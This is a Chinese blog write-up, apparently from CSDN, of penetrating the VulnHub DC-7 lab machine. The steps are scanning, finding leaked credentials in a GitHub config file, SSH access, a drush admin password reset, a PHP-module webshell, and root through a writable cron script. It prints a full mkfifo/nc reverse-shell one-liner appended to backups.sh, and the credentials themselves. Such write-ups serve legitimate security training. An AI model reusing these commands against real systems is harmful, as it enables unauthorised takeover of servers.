vulnhub-DC-7靶机渗透记录

准备

kail IP: 192.168.178.162
dc-7 IP :未知

信息收集

nmap -sV 192.168.178.162/24

在这里插入图片描述

发现靶机IP为192.168.178.162,惯例看看还有没有其他开放的端口
访问80端口,发现是drupalCMS
在这里插入图片描述
查看页面给出的提示

欢迎来到DC-7
DC-7引入了一些“新”概念,但是我会让您知道它们是什么。😃
尽管这一挑战并不是技术性的全部,但是如果你需要诉诸于暴力破解或字典攻击,那么您可能不会成功。
您将要做的就是在盒子外面思考。
方式在盒子外面。😃

找了找,在页面下面发现个DC7USER ,在百度搜索@DC7USER后,发现是一个Twitter用户,进入Twitter后搜索这个用户,进入这个用户首页

https://github.com/Dc7User/

点击GitHub的链接发现一个staffdb的源码文件夹,并给了提示这源码是dc7靶机的突破口

在这里插入图片描述
在这里插入图片描述
直接在github上找有没有上面关键信息,分析源码,发现一个config.php文件,在这个配置文件里找到了用户名dc7user和密码MdR3xOgB7#dW
在这里插入图片描述

获取后台账户密码

试了试80端口的登录,发现没有用,那就是ssh登录啦
在这里插入图片描述

发现一个backups文件夹和一个mbox文件,都看看
在这里插入图片描述
打开mbox文件发现是一个计划任务,定时备份,并发现备份执行的源码在/opt/scripts目录下
在这里插入图片描述

进入到/opt/scripts目录下,查看backups.sh脚本文件,发现两个命令gpg和drush(gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码)

在这里插入图片描述

进入到/var/www/html目录下,因为网站会有一个admin用户,所以使用drush命令修改admin用户的密码为123456,发现可以修改成功

drush user-password admin --password=“123456”

反弹shell

登录80端口,刚开始也是向直接在content直接上一句话木马的,但是发现不行,查了查发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入
在这里插入图片描述
这里试了好多次用链接上传都不行,干脆我直接下载压缩包直接上传了
下载地址:

https://www.drupal.org/project/php

在这里插入图片描述
在这里插入图片描述
激活这个模块,并且滑到底部点击Install
在这里插入图片描述
安装成功

在这里插入图片描述

然后对首页面进行编辑
在这里插入图片描述

直接用蚁剑连接,连接成功后还是习惯性在蚁剑终端反弹shell给kail

权限提升

在这里插入图片描述

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell
在这里插入图片描述

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.178.162 9999 >/tmp/f" >> backups.sh

在这里插入图片描述

kail中开监听,反弹shell之后拿到root权限
在这里插入图片描述

参考:
https://blog.csdn.net/weixin_43583637/article/details/102809227

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值